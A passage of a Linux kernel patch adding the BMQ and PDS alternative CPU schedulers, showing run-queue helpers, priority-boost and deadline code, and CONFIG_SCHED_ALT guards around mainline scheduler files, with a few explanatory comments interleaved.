++	long calc_load_active;
++
++	u64 clock, last_tick;
++	u64 last_ts_switch;
++	u64 clock_task;
++
++	unsigned int  nr_running;
++	unsigned long nr_uninterruptible;
++
++#ifdef CONFIG_SCHED_HRTICK
++#ifdef CONFIG_SMP
++	call_single_data_t hrtick_csd;
++#endif
++	struct hrtimer		hrtick_timer;
++	ktime_t			hrtick_time;
++#endif
++
++#ifdef CONFIG_SCHEDSTATS
++
++	/* latency stats */
++	struct sched_info rq_sched_info;
++	unsigned long long rq_cpu_time;
++	/* could above be rq->cfs_rq.exec_clock + rq->rt_rq.rt_runtime ? */
++
++	/* sys_sched_yield() stats */
++	unsigned int yld_count;
++
++	/* schedule() stats */
++	unsigned int sched_switch;
++	unsigned int sched_count;
++	unsigned int sched_goidle;
++
++	/* try_to_wake_up() stats */
++	unsigned int ttwu_count;
++	unsigned int ttwu_local;
++#endif /* CONFIG_SCHEDSTATS */
++
++#ifdef CONFIG_CPU_IDLE
++	/* Must be inspected within an rcu lock section */
++	struct cpuidle_state *idle_state;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++#ifdef CONFIG_SMP
++	call_single_data_t	nohz_csd;
++#endif
++	atomic_t		nohz_flags;
++#endif /* CONFIG_NO_HZ_COMMON */
++};
++
++extern unsigned long rq_load_util(struct rq *rq, unsigned long max);
++
++extern unsigned long calc_load_update;
++extern atomic_long_t calc_load_tasks;
++
++extern void calc_global_load_tick(struct rq *this_rq);
++extern long calc_load_fold_active(struct rq *this_rq, long adjust);
++
++DECLARE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++#define cpu_rq(cpu)		(&per_cpu(runqueues, (cpu)))
++#define this_rq()		this_cpu_ptr(&runqueues)
++#define task_rq(p)		cpu_rq(task_cpu(p))
++#define cpu_curr(cpu)		(cpu_rq(cpu)->curr)
++#define raw_rq()		raw_cpu_ptr(&runqueues)
++
++#ifdef CONFIG_SMP
++#if defined(CONFIG_SCHED_DEBUG) && defined(CONFIG_SYSCTL)
++void register_sched_domain_sysctl(void);
++void unregister_sched_domain_sysctl(void);
++#else
++static inline void register_sched_domain_sysctl(void)
++{
++}
++static inline void unregister_sched_domain_sysctl(void)
++{
++}
++#endif
++
++extern bool sched_smp_initialized;
++
++enum {
++	ITSELF_LEVEL_SPACE_HOLDER,
++#ifdef CONFIG_SCHED_SMT
++	SMT_LEVEL_SPACE_HOLDER,
++#endif
++	COREGROUP_LEVEL_SPACE_HOLDER,
++	CORE_LEVEL_SPACE_HOLDER,
++	OTHER_LEVEL_SPACE_HOLDER,
++	NR_CPU_AFFINITY_LEVELS
++};
++
++DECLARE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DECLARE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++
++static inline int
++__best_mask_cpu(const cpumask_t *cpumask, const cpumask_t *mask)
++{
++	int cpu;
++
++	while ((cpu = cpumask_any_and(cpumask, mask)) >= nr_cpu_ids)
++		mask++;
++
++	return cpu;
++}
++
++static inline int best_mask_cpu(int cpu, const cpumask_t *mask)
++{
++	return __best_mask_cpu(mask, per_cpu(sched_cpu_topo_masks, cpu));
++}
++
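
/*
 * Illustrative note on the walk above (not patch code): the per-CPU
 * sched_cpu_topo_masks[] levels are ordered nearest-first per the
 * space-holder enum above -- the CPU itself, its SMT siblings (when
 * configured), the core group, the core level, then everything else.
 * best_mask_cpu() therefore returns a CPU from the closest topology
 * level that intersects the candidate mask, e.g. an SMT sibling is
 * preferred over a CPU that merely shares a last-level cache.
 */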
++extern void flush_smp_call_function_queue(void);
++
++#else  /* !CONFIG_SMP */
++static inline void flush_smp_call_function_queue(void) { }
++#endif
++
++#ifndef arch_scale_freq_tick
++static __always_inline
++void arch_scale_freq_tick(void)
++{
++}
++#endif
++
++#ifndef arch_scale_freq_capacity
++static __always_inline
++unsigned long arch_scale_freq_capacity(int cpu)
++{
++	return SCHED_CAPACITY_SCALE;
++}
++#endif
++
++static inline u64 __rq_clock_broken(struct rq *rq)
++{
++	return READ_ONCE(rq->clock);
++}
++
++static inline u64 rq_clock(struct rq *rq)
++{
++	/*
++	 * Relax the lockdep_assert_held() check: as in VRQ, callers of
++	 * sched_info_xxxx() may not hold rq->lock
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock;
++}
++
++static inline u64 rq_clock_task(struct rq *rq)
++{
++	/*
++	 * Relax the lockdep_assert_held() check: as in VRQ, callers of
++	 * sched_info_xxxx() may not hold rq->lock
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock_task;
++}
++
++/*
++ * {de,en}queue flags:
++ *
++ * DEQUEUE_SLEEP  - task is no longer runnable
++ * ENQUEUE_WAKEUP - task just became runnable
++ *
++ */
++
++#define DEQUEUE_SLEEP		0x01
++
++#define ENQUEUE_WAKEUP		0x01
++
++
++/*
++ * Below are the scheduler APIs used by other kernel code.
++ * They use a dummy rq_flags.
++ * ToDo: BMQ needs to support these APIs for compatibility with mainline
++ * scheduler code.
++ */
++struct rq_flags {
++	unsigned long flags;
++};
++
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock);
++
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock);
++
++static inline void __task_rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline void
++task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
++	__releases(rq->lock)
++	__releases(p->pi_lock)
++{
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++}
++
++static inline void
++rq_lock(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock(&rq->lock);
++}
++
++static inline void
++rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline void
++rq_lock_irq(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irq(&rq->lock);
++}
++
++static inline void
++rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++static inline struct rq *
++this_rq_lock_irq(struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	local_irq_disable();
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	return rq;
++}
++
++static inline raw_spinlock_t *__rq_lockp(struct rq *rq)
++{
++	return &rq->lock;
++}
++
++static inline raw_spinlock_t *rq_lockp(struct rq *rq)
++{
++	return __rq_lockp(rq);
++}
++
++static inline void lockdep_assert_rq_held(struct rq *rq)
++{
++	lockdep_assert_held(__rq_lockp(rq));
++}
++
++extern void raw_spin_rq_lock_nested(struct rq *rq, int subclass);
++extern void raw_spin_rq_unlock(struct rq *rq);
++
++static inline void raw_spin_rq_lock(struct rq *rq)
++{
++	raw_spin_rq_lock_nested(rq, 0);
++}
++
++static inline void raw_spin_rq_lock_irq(struct rq *rq)
++{
++	local_irq_disable();
++	raw_spin_rq_lock(rq);
++}
++
++static inline void raw_spin_rq_unlock_irq(struct rq *rq)
++{
++	raw_spin_rq_unlock(rq);
++	local_irq_enable();
++}
++
++static inline int task_current(struct rq *rq, struct task_struct *p)
++{
++	return rq->curr == p;
++}
++
++static inline bool task_on_cpu(struct task_struct *p)
++{
++	return p->on_cpu;
++}
++
++extern int task_running_nice(struct task_struct *p);
++
++extern struct static_key_false sched_schedstats;
++
++#ifdef CONFIG_CPU_IDLE
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++	rq->idle_state = idle_state;
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	WARN_ON(!rcu_read_lock_held());
++	return rq->idle_state;
++}
++#else
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	return NULL;
++}
++#endif
++
++static inline int cpu_of(const struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	return rq->cpu;
++#else
++	return 0;
++#endif
++}
++
++#include "stats.h"
++
++#ifdef CONFIG_NO_HZ_COMMON
++#define NOHZ_BALANCE_KICK_BIT	0
++#define NOHZ_STATS_KICK_BIT	1
++
++#define NOHZ_BALANCE_KICK	BIT(NOHZ_BALANCE_KICK_BIT)
++#define NOHZ_STATS_KICK		BIT(NOHZ_STATS_KICK_BIT)
++
++#define NOHZ_KICK_MASK	(NOHZ_BALANCE_KICK | NOHZ_STATS_KICK)
++
++#define nohz_flags(cpu)	(&cpu_rq(cpu)->nohz_flags)
++
++/* TODO: needed?
++extern void nohz_balance_exit_idle(struct rq *rq);
++#else
++static inline void nohz_balance_exit_idle(struct rq *rq) { }
++*/
++#endif
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++struct irqtime {
++	u64			total;
++	u64			tick_delta;
++	u64			irq_start_time;
++	struct u64_stats_sync	sync;
++};
++
++DECLARE_PER_CPU(struct irqtime, cpu_irqtime);
++
++/*
++ * Returns the irqtime minus the softirq time computed by ksoftirqd.
++ * Otherwise ksoftirqd's sum_exec_runtime would have its own runtime
++ * subtracted and would never move forward.
++ */
++static inline u64 irq_time_read(int cpu)
++{
++	struct irqtime *irqtime = &per_cpu(cpu_irqtime, cpu);
++	unsigned int seq;
++	u64 total;
++
++	do {
++		seq = __u64_stats_fetch_begin(&irqtime->sync);
++		total = irqtime->total;
++	} while (__u64_stats_fetch_retry(&irqtime->sync, seq));
++
++	return total;
++}
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++
++#ifdef CONFIG_CPU_FREQ
++DECLARE_PER_CPU(struct update_util_data __rcu *, cpufreq_update_util_data);
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++extern int __init sched_tick_offload_init(void);
++#else
++static inline int sched_tick_offload_init(void) { return 0; }
++#endif
++
++#ifdef arch_scale_freq_capacity
++#ifndef arch_scale_freq_invariant
++#define arch_scale_freq_invariant()	(true)
++#endif
++#else /* arch_scale_freq_capacity */
++#define arch_scale_freq_invariant()	(false)
++#endif
++
++extern void schedule_idle(void);
++
++#define cap_scale(v, s) ((v)*(s) >> SCHED_CAPACITY_SHIFT)
++
++/*
++ * !! For sched_setattr_nocheck() (kernel) only !!
++ *
++ * This is actually gross. :(
++ *
++ * It is used to make schedutil kworker(s) higher priority than SCHED_DEADLINE
++ * tasks, but still be able to sleep. We need this on platforms that cannot
++ * atomically change clock frequency. Remove once fast switching will be
++ * available on such platforms.
++ *
++ * SUGOV stands for SchedUtil GOVernor.
++ */
++#define SCHED_FLAG_SUGOV	0x10000000
++
++#ifdef CONFIG_MEMBARRIER
++/*
++ * The scheduler provides memory barriers required by membarrier between:
++ * - prior user-space memory accesses and store to rq->membarrier_state,
++ * - store to rq->membarrier_state and following user-space memory accesses.
++ * In the same way it provides those guarantees around store to rq->curr.
++ */
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++	int membarrier_state;
++
++	if (prev_mm == next_mm)
++		return;
++
++	membarrier_state = atomic_read(&next_mm->membarrier_state);
++	if (READ_ONCE(rq->membarrier_state) == membarrier_state)
++		return;
++
++	WRITE_ONCE(rq->membarrier_state, membarrier_state);
++}
++#else
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++}
++#endif
++
++#ifdef CONFIG_NUMA
++extern int sched_numa_find_closest(const struct cpumask *cpus, int cpu);
++#else
++static inline int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return nr_cpu_ids;
++}
++#endif
++
++extern void swake_up_all_locked(struct swait_queue_head *q);
++extern void __prepare_to_swait(struct swait_queue_head *q, struct swait_queue *wait);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++extern int preempt_dynamic_mode;
++extern int sched_dynamic_mode(const char *str);
++extern void sched_dynamic_update(int mode);
++#endif
++
++static inline void nohz_run_idle_balance(int cpu) { }
++
++static inline
++unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
++				  struct task_struct *p)
++{
++	return util;
++}
++
++static inline bool uclamp_rq_is_capped(struct rq *rq) { return false; }
++
++#endif /* ALT_SCHED_H */
+diff --git a/kernel/sched/bmq.h b/kernel/sched/bmq.h
+new file mode 100644
+index 000000000000..66b77291b9d0
+--- /dev/null
++++ b/kernel/sched/bmq.h
+@@ -0,0 +1,110 @@
++#define ALT_SCHED_VERSION_MSG "sched/bmq: BMQ CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++/*
++ * BMQ only routines
++ */
++#define rq_switch_time(rq)	((rq)->clock - (rq)->last_ts_switch)
++#define boost_threshold(p)	(sched_timeslice_ns >>\
++				 (15 - MAX_PRIORITY_ADJ -  (p)->boost_prio))
++
++static inline void boost_task(struct task_struct *p)
++{
++	int limit;
++
++	switch (p->policy) {
++	case SCHED_NORMAL:
++		limit = -MAX_PRIORITY_ADJ;
++		break;
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		limit = 0;
++		break;
++	default:
++		return;
++	}
++
++	if (p->boost_prio > limit)
++		p->boost_prio--;
++}
++
++static inline void deboost_task(struct task_struct *p)
++{
++	if (p->boost_prio < MAX_PRIORITY_ADJ)
++		p->boost_prio++;
++}
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms) {}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	return p->prio + p->boost_prio - MAX_RT_PRIO;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio : MAX_RT_PRIO / 2 + (p->prio + p->boost_prio) / 2;
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return task_sched_prio(p);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return prio;
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return idx;
++}
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p)) {
++		if (SCHED_RR != p->policy)
++			deboost_task(p);
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++	}
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq) {}
++
++inline int task_running_nice(struct task_struct *p)
++{
++	return (p->prio + p->boost_prio > DEFAULT_PRIO + MAX_PRIORITY_ADJ);
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p)
++{
++	if (this_rq()->clock_task - p->last_ran > sched_timeslice_ns)
++		boost_task(p);
++}
++#endif
++
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq)
++{
++	if (rq_switch_time(rq) < boost_threshold(p))
++		boost_task(p);
++}
++
++static inline void update_rq_time_edge(struct rq *rq) {}
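
/*
 * Worked example for the BMQ mapping above (a sketch, not patch code):
 * a nice-0 SCHED_NORMAL task has p->prio == 120, and with
 * MAX_PRIORITY_ADJ == 7 its boost_prio stays within [-7, 7], so
 * task_sched_prio() yields 50 + (120 + boost)/2, i.e. queue index
 * 106..113.  A freshly forked task starts at boost +7 (index 113, see
 * sched_task_fork()) and works its way toward index 106 as qualifying
 * wakeups call boost_task(); burning a whole timeslice calls
 * deboost_task() and pushes it back toward 113.
 */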
+diff --git a/kernel/sched/build_policy.c b/kernel/sched/build_policy.c
+index d9dc9ab3773f..71a25540d65e 100644
+--- a/kernel/sched/build_policy.c
++++ b/kernel/sched/build_policy.c
+@@ -42,13 +42,19 @@
+ 
+ #include "idle.c"
+ 
++#ifndef CONFIG_SCHED_ALT
+ #include "rt.c"
++#endif
+ 
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ # include "cpudeadline.c"
++#endif
+ # include "pelt.c"
+ #endif
+ 
+ #include "cputime.c"
+-#include "deadline.c"
+ 
++#ifndef CONFIG_SCHED_ALT
++#include "deadline.c"
++#endif
+diff --git a/kernel/sched/build_utility.c b/kernel/sched/build_utility.c
+index 99bdd96f454f..23f80a86d2d7 100644
+--- a/kernel/sched/build_utility.c
++++ b/kernel/sched/build_utility.c
+@@ -85,7 +85,9 @@
+ 
+ #ifdef CONFIG_SMP
+ # include "cpupri.c"
++#ifndef CONFIG_SCHED_ALT
+ # include "stop_task.c"
++#endif
+ # include "topology.c"
+ #endif
+ 
+diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
+index 1207c78f85c1..68812e0756cb 100644
+--- a/kernel/sched/cpufreq_schedutil.c
++++ b/kernel/sched/cpufreq_schedutil.c
+@@ -159,9 +159,14 @@ static void sugov_get_util(struct sugov_cpu *sg_cpu)
+ 	struct rq *rq = cpu_rq(sg_cpu->cpu);
+ 
+ 	sg_cpu->max = arch_scale_cpu_capacity(sg_cpu->cpu);
++#ifndef CONFIG_SCHED_ALT
+ 	sg_cpu->bw_dl = cpu_bw_dl(rq);
+ 	sg_cpu->util = effective_cpu_util(sg_cpu->cpu, cpu_util_cfs(sg_cpu->cpu),
+ 					  FREQUENCY_UTIL, NULL);
++#else
++	sg_cpu->bw_dl = 0;
++	sg_cpu->util = rq_load_util(rq, sg_cpu->max);
++#endif /* CONFIG_SCHED_ALT */
+ }
+ 
+ /**
+@@ -305,8 +310,10 @@ static inline bool sugov_cpu_is_busy(struct sugov_cpu *sg_cpu) { return false; }
+  */
+ static inline void ignore_dl_rate_limit(struct sugov_cpu *sg_cpu)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	if (cpu_bw_dl(cpu_rq(sg_cpu->cpu)) > sg_cpu->bw_dl)
+ 		sg_cpu->sg_policy->limits_changed = true;
++#endif
+ }
+ 
+ static inline bool sugov_update_single_common(struct sugov_cpu *sg_cpu,
+@@ -606,6 +613,7 @@ static int sugov_kthread_create(struct sugov_policy *sg_policy)
+ 	}
+ 
+ 	ret = sched_setattr_nocheck(thread, &attr);
++
+ 	if (ret) {
+ 		kthread_stop(thread);
+ 		pr_warn("%s: failed to set SCHED_DEADLINE\n", __func__);
+@@ -838,7 +846,9 @@ cpufreq_governor_init(schedutil_gov);
+ #ifdef CONFIG_ENERGY_MODEL
+ static void rebuild_sd_workfn(struct work_struct *work)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	rebuild_sched_domains_energy();
++#endif /* CONFIG_SCHED_ALT */
+ }
+ static DECLARE_WORK(rebuild_sd_work, rebuild_sd_workfn);
+ 
+diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
+index 95fc77853743..b48b3f9ed47f 100644
+--- a/kernel/sched/cputime.c
++++ b/kernel/sched/cputime.c
+@@ -122,7 +122,7 @@ void account_user_time(struct task_struct *p, u64 cputime)
+ 	p->utime += cputime;
+ 	account_group_user_time(p, cputime);
+ 
+-	index = (task_nice(p) > 0) ? CPUTIME_NICE : CPUTIME_USER;
++	index = task_running_nice(p) ? CPUTIME_NICE : CPUTIME_USER;
+ 
+ 	/* Add user time to cpustat. */
+ 	task_group_account_field(p, index, cputime);
+@@ -146,7 +146,7 @@ void account_guest_time(struct task_struct *p, u64 cputime)
+ 	p->gtime += cputime;
+ 
+ 	/* Add guest time to cpustat. */
+-	if (task_nice(p) > 0) {
++	if (task_running_nice(p)) {
+ 		task_group_account_field(p, CPUTIME_NICE, cputime);
+ 		cpustat[CPUTIME_GUEST_NICE] += cputime;
+ 	} else {
+@@ -284,7 +284,7 @@ static inline u64 account_other_time(u64 max)
+ #ifdef CONFIG_64BIT
+ static inline u64 read_sum_exec_runtime(struct task_struct *t)
+ {
+-	return t->se.sum_exec_runtime;
++	return tsk_seruntime(t);
+ }
+ #else
+ static u64 read_sum_exec_runtime(struct task_struct *t)
+@@ -294,7 +294,7 @@ static u64 read_sum_exec_runtime(struct task_struct *t)
+ 	struct rq *rq;
+ 
+ 	rq = task_rq_lock(t, &rf);
+-	ns = t->se.sum_exec_runtime;
++	ns = tsk_seruntime(t);
+ 	task_rq_unlock(rq, t, &rf);
+ 
+ 	return ns;
+@@ -626,7 +626,7 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
+ void task_cputime_adjusted(struct task_struct *p, u64 *ut, u64 *st)
+ {
+ 	struct task_cputime cputime = {
+-		.sum_exec_runtime = p->se.sum_exec_runtime,
++		.sum_exec_runtime = tsk_seruntime(p),
+ 	};
+ 
+ 	if (task_cputime(p, &cputime.utime, &cputime.stime))
+diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
+index 1637b65ba07a..033c6deeb515 100644
+--- a/kernel/sched/debug.c
++++ b/kernel/sched/debug.c
+@@ -7,6 +7,7 @@
+  * Copyright(C) 2007, Red Hat, Inc., Ingo Molnar
+  */
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * This allows printing both to /proc/sched_debug and
+  * to the console
+@@ -215,6 +216,7 @@ static const struct file_operations sched_scaling_fops = {
+ };
+ 
+ #endif /* SMP */
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+ 
+@@ -278,6 +280,7 @@ static const struct file_operations sched_dynamic_fops = {
+ 
+ #endif /* CONFIG_PREEMPT_DYNAMIC */
+ 
++#ifndef CONFIG_SCHED_ALT
+ __read_mostly bool sched_debug_verbose;
+ 
+ static const struct seq_operations sched_debug_sops;
+@@ -293,6 +296,7 @@ static const struct file_operations sched_debug_fops = {
+ 	.llseek		= seq_lseek,
+ 	.release	= seq_release,
+ };
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ static struct dentry *debugfs_sched;
+ 
+@@ -302,12 +306,15 @@ static __init int sched_init_debug(void)
+ 
+ 	debugfs_sched = debugfs_create_dir("sched", NULL);
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_file("features", 0644, debugfs_sched, NULL, &sched_feat_fops);
+ 	debugfs_create_bool("verbose", 0644, debugfs_sched, &sched_debug_verbose);
++#endif /* !CONFIG_SCHED_ALT */
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+ 	debugfs_create_file("preempt", 0644, debugfs_sched, NULL, &sched_dynamic_fops);
+ #endif
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_u32("latency_ns", 0644, debugfs_sched, &sysctl_sched_latency);
+ 	debugfs_create_u32("min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_min_granularity);
+ 	debugfs_create_u32("idle_min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_idle_min_granularity);
+@@ -337,11 +344,13 @@ static __init int sched_init_debug(void)
+ #endif
+ 
+ 	debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ 	return 0;
+ }
+ late_initcall(sched_init_debug);
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_SMP
+ 
+ static cpumask_var_t		sd_sysctl_cpus;
+@@ -1068,6 +1077,7 @@ void proc_sched_set_task(struct task_struct *p)
+ 	memset(&p->stats, 0, sizeof(p->stats));
+ #endif
+ }
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ void resched_latency_warn(int cpu, u64 latency)
+ {
+diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
+index f26ab2675f7d..480d4ad16d45 100644
+--- a/kernel/sched/idle.c
++++ b/kernel/sched/idle.c
+@@ -400,6 +400,7 @@ void cpu_startup_entry(enum cpuhp_state state)
+ 		do_idle();
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * idle-task scheduling class.
+  */
+@@ -521,3 +522,4 @@ DEFINE_SCHED_CLASS(idle) = {
+ 	.switched_to		= switched_to_idle,
+ 	.update_curr		= update_curr_idle,
+ };
++#endif
+diff --git a/kernel/sched/pds.h b/kernel/sched/pds.h
+new file mode 100644
+index 000000000000..56a649d02e49
+--- /dev/null
++++ b/kernel/sched/pds.h
+@@ -0,0 +1,127 @@
++#define ALT_SCHED_VERSION_MSG "sched/pds: PDS CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++static int sched_timeslice_shift = 22;
++
++#define NORMAL_PRIO_MOD(x)	((x) & (NORMAL_PRIO_NUM - 1))
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms)
++{
++	if (2 == timeslice_ms)
++		sched_timeslice_shift = 21;
++}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	s64 delta = p->deadline - rq->time_edge + NORMAL_PRIO_NUM - NICE_WIDTH;
++
++	if (WARN_ONCE(delta > NORMAL_PRIO_NUM - 1,
++		      "pds: task_sched_prio_normal() delta %lld\n", delta))
++		return NORMAL_PRIO_NUM - 1;
++
++	return (delta < 0) ? 0 : delta;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio :
++		MIN_NORMAL_PRIO + task_sched_prio_normal(p, task_rq(p));
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD(task_sched_prio_normal(p, rq) + rq->time_edge);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return (IDLE_TASK_SCHED_PRIO == prio || prio < MAX_RT_PRIO) ? prio :
++		MIN_NORMAL_PRIO + NORMAL_PRIO_MOD((prio - MIN_NORMAL_PRIO) +
++						  rq->time_edge);
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return (idx < MAX_RT_PRIO) ? idx : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD((idx - MIN_NORMAL_PRIO) + NORMAL_PRIO_NUM -
++				NORMAL_PRIO_MOD(rq->time_edge));
++}
++
++static inline void sched_renew_deadline(struct task_struct *p, const struct rq *rq)
++{
++	if (p->prio >= MAX_RT_PRIO)
++		p->deadline = (rq->clock >> sched_timeslice_shift) +
++			p->static_prio - (MAX_PRIO - NICE_WIDTH);
++}
++
++int task_running_nice(struct task_struct *p)
++{
++	return (p->prio > DEFAULT_PRIO);
++}
++
++static inline void update_rq_time_edge(struct rq *rq)
++{
++	struct list_head head;
++	u64 old = rq->time_edge;
++	u64 now = rq->clock >> sched_timeslice_shift;
++	u64 prio, delta;
++
++	if (now == old)
++		return;
++
++	delta = min_t(u64, NORMAL_PRIO_NUM, now - old);
++	INIT_LIST_HEAD(&head);
++
++	for_each_set_bit(prio, &rq->queue.bitmap[2], delta)
++		list_splice_tail_init(rq->queue.heads + MIN_NORMAL_PRIO +
++				      NORMAL_PRIO_MOD(prio + old), &head);
++
++	rq->queue.bitmap[2] = (NORMAL_PRIO_NUM == delta) ? 0UL :
++		rq->queue.bitmap[2] >> delta;
++	rq->time_edge = now;
++	if (!list_empty(&head)) {
++		u64 idx = MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(now);
++		struct task_struct *p;
++
++		list_for_each_entry(p, &head, sq_node)
++			p->sq_idx = idx;
++
++		list_splice(&head, rq->queue.heads + idx);
++		rq->queue.bitmap[2] |= 1UL;
++	}
++}
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++	sched_renew_deadline(p, rq);
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p))
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq)
++{
++	u64 max_dl = rq->time_edge + NICE_WIDTH - 1;
++	if (unlikely(p->deadline > max_dl))
++		p->deadline = max_dl;
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	sched_renew_deadline(p, rq);
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	time_slice_expired(p, rq);
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p) {}
++#endif
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq) {}
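
/*
 * Worked example for the PDS deadline math above (a sketch, not patch
 * code; it assumes mainline's static_prio == nice + DEFAULT_PRIO): with
 * the default 4 ms timeslice, sched_timeslice_shift stays 22, so one
 * time_edge tick is 2^22 ns ~= 4.19 ms (a 2 ms timeslice selects shift
 * 21, ~2.10 ms).  Under PDS, DEFAULT_PRIO is 172 and
 * MAX_PRIO - NICE_WIDTH is 152, so sched_renew_deadline() sets
 * p->deadline = (rq->clock >> 22) + nice + 20: a nice -20 task is due
 * on the current tick, while a nice +19 task is due 39 ticks (~163 ms)
 * later.  update_rq_time_edge() then rotates queues whose tick has
 * passed onto the current head, so earlier deadlines always drain first.
 */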
+diff --git a/kernel/sched/pelt.c b/kernel/sched/pelt.c
+index 0f310768260c..bd38bf738fe9 100644
+--- a/kernel/sched/pelt.c
++++ b/kernel/sched/pelt.c
+@@ -266,6 +266,7 @@ ___update_load_avg(struct sched_avg *sa, unsigned long load)
+ 	WRITE_ONCE(sa->util_avg, sa->util_sum / divider);
